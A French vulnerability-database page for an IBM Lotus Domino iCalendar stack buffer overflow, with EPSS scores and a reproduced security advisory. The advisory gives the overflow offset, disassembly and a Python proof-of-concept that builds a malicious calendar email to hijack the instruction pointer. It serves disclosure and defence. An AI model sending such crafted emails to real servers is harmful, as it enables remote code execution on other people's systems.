CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Stack-based buffer overflow in the MailCheck821Address function in nnotes.dll in the nrouter.exe service in the server in IBM Lotus Domino 8.0.x before 8.0.2 FP5 and 8.5.x before 8.5.1 FP2 allows remote attackers to execute arbitrary code via a long e-mail address in an ORGANIZER:mailto header in an iCalendar calendar-invitation e-mail message, aka SPR NRBY7ZPJ9V.
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
9.3
AV:N/AC:M/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
79.67%
–
–
2023-03-05
–
–
79.67%
–
–
2023-03-12
–
–
–
91.26%
–
2023-03-19
–
–
–
90.78%
–
2023-05-07
–
–
–
92.59%
–
2023-06-04
–
–
–
92.59%
–
2023-07-02
–
–
–
92.23%
–
2023-08-20
–
–
–
93%
–
2023-11-19
–
–
–
91.67%
–
2023-12-31
–
–
–
91.23%
–
2024-03-31
–
–
–
93.65%
–
2024-06-02
–
–
–
93.66%
–
2024-06-23
–
–
–
93.3%
–
2024-08-04
–
–
–
92.76%
–
2024-11-03
–
–
–
92.34%
–
2024-12-22
–
–
–
90.37%
–
2025-03-16
–
–
–
90.31%
–
2025-01-19
–
–
–
90.37%
–
2025-03-18
–
–
–
–
76.28%
2025-03-30
–
–
–
–
77.74%
2025-03-30
–
–
–
–
77.74,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2010-09-13 22h00 +00:00 Auteur : A. Plaskett EDB Vérifié : Yes
source: http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/
IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow Vulnerability
Package Name: Lotus Domino Server
Date Reported: 2010-01-09
Affected Versions: Versions 8.0 and 8.5 on AIX, AIX 64bit, Linux, Linux iSeries, Linux
zSeries, Solaris, Windows, Windows 64bit, z/OS
CVE Reference Not Yet Assigned
Author A. Plaskett
Severity High Risk
Local/Remote Remote
Impact The vulnerability would enable an attacker to execute arbitrary code
on the system in the context of the currently executing nrouter process.
Vulnerability Class Stack based buffer overflow
Vendor URL http://www.ibm.com
Version 8.0, 8.5
Vendor Response A patch is available from: http://www-
01.ibm.com/support/docview.wss?rs=475&uid=swg21446515
Overview:
An unauthenticated remote code execution vulnerability was identified in the code
handling the conversion and checking of an iCalendar email address parameter. An
overly large email address string can lead to the overflow of a stack allocated buffer
due to insufficient bounds checking when a CStrcpy (string copy) is performed. A
remote, unauthenticated attacker could execute code in the context of the Lotus
Domino server process (nrouter.exe) by sending a specially crafted malicious email
to the Lotus Domino SMTP server.
Technical Background
The vulnerability exists due to a lack of bounds checking performed in the function
“nnotes!MailCheck821Address” before performing a string copy operation (Cstrcpy).
.text:602738F7 push esi
.text:602738F8 push edx
.text:602738F9 call Cstrcpy
The ESI register holds the source address of the copy, which is read from the
iCalendar email and so is under an attacker’s control. The EDX register holds the
address of the fixed size stack buffer.
Consequently, the Cstrcpy operation can be passed a string which overflows the
fixed size stack based buffer and causes memory corruption. This memory corruption
can be used to hijack the flow of execution of the program and execute arbitrary
code.
Exploit Information
An attacker could exploit this vulnerability by crafting an email containing an
iCalendar with an email address string which is sufficiently long to overwrite stack
based variables and also overwrite the saved return address which is stored in the
stack frame (the required string length being 2374 bytes). The attacker could then
pass an address which would be used to overwrite the saved return address. When
the function returns, the return address is popped off the stack and loaded into the
EIP (Extended Instruction Pointer) register. At this point, the attacker has full control
over the execution of the program and can execute their desired code.
The following proof of concept Python code excerpt can be used to trigger the
vulnerability with the malicious ORGANIZER mailto address:
ret_address = “BBBB”
overflow = ("A" * 2374) + ret_address + ("C" * 6632)
organiser = "ORGANIZER:mailto:H@%s.com" % overflow
body = "Content-Type: text/calendar; method=COUNTER; charset="UTF-8"
Subject: sent_mail2.txt
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
BEGIN:VCALENDAR
METHOD:COUNTER
PRODID:-//HGOPO@VDGCOHBCOGHRO@GQHOOPGHHCCCGCBGGCLGMCPN//
VERSION:2.0
BEGIN:VEVENT
UID:KORBOOGGGOHGNIH
SEQ:2
RRULE:aaaa
%s
ATTENDEE;:Mailto:aaaa@localdomain
SUMMARY:PGOMG@OMPGR@KOFMEOPNCMH
DTSTART:20091130T093000Z
DTEND:20091130T093000Z
DTSTAMP:20091130T083147Z
LOCATION:Location
STATUS:aaaa
END:VEVENT
END:VCALENDAR
“”” % organiser
If this email is delivered to a Lotus Domino SMTP server, nrouter will perform the
following calls: -
0833519c 60ca844c 094dddb8 nnotes!MailCheck821Address+0xb07
0833519c 00000019 083200f8 nnotes!Note2iCal+0x1c25c
0000000a 083200f8 094de824 nnotes!iCal2NotesExtract+0x247
000000c7 06e41f62 083210ac nRouter+0x3ee9e
00000063 000000c7 06e41f62 nRouter+0x3f1cd
02a19f58 00000000 000000c7 nRouter+0x1c433
004673a0 00000000 03f23325 nRouter+0x1ddd0
004673a0 21700001 00000001 nRouter+0x1e3a5
029b0000 00000000 00000000 nRouter+0x1e6ed
00000000 094dffd4 7751b3f5 nnotes!OSProcessIsGUI+0xef
00000000 7e454e05 00000000 kernel32!BaseThreadInitThunk+0x12
600fe640 00000000 00000000 ntdll!RtlInitializeExceptionChain+0x63
600fe640 00000000 00000000 ntdll!RtlInitializeExceptionChain+0x36
Leading to the incorrectly bounded Cstrcpy function being called and the return
address being overwritten with 42424242, which will then be loaded into the EIP
register. At this point the attacker has full control over the flow of execution of the
program (nrouter.exe).
Dependencies
In order to exploit this vulnerability an attacker would need to know the email
address of a valid Lotus Domino mailbox account. It should be noted, however, that
no user interaction is required for the vulnerability to be triggered (nrouter will
process the email automatically).